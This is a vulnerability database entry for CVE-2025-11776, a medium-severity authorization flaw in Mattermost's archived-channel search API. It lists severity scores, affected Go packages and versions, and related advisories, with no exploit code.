CVE-2025-11776Incorrect Authorization in Mattermost Mattermost

CWE-863Incorrect AuthorizationCWE-862Missing Authorization6 documents4 sources
Severity
4.3MEDIUMNVD
EPSS
0.0%
top 90.65%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
7
Github.com Mattermost MattermostGithub.com Mattermost Mattermost-serverGithub.com Mattermost Mattermost-server V5+4 more
Timeline
PublishedNov 14
Latest updateNov 17

Description

Mattermost versions <11 fail to properly restrict access to archived channel search API which allows guest users to discover archived public channels via the `/api/v4/teams/{team_id}/channels/search_archived` endpoint

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NExploitability: 2.8 | Impact: 1.4

Affected Packages7 packages

Gogithub.com/mattermost_mattermost< 5.3.2-0.20250815165020-c8d66301415d
Gogithub.com/mattermost_mattermost-server< 5.3.2-0.20250815165020-c8d66301415d
Gogithub.com/mattermost_mattermost-server_v5< 5.3.2-0.20250815165020-c8d66301415d
Gogithub.com/mattermost_mattermost-server_v6< 5.3.2-0.20250815165020-c8d66301415d

🔴Vulnerability Details

5
OSV
Mattermost fails to properly restrict access to archived channel search API in github.com/mattermost/mattermost2025-11-17
CVEList
Guest user can discover archived public channels2025-11-14
OSV
Mattermost fails to properly restrict access to archived channel search API2025-11-14
GHSA
Mattermost fails to properly restrict access to archived channel search API2025-11-14
GHSA
GeoServer Missing Authorization on REST API Index2025-06-10
CVE-2025-11776 — Incorrect Authorization | cvebase